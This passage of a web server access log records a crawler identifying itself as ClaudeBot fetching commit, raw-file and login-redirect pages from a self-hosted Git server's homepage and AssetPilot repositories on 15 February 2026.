ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13902] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11903] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14694] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11531] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10201] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 23998] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16725] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=rendered" [Client 216.73.216.188] [Length 10954] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 14221] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14917] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11319] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 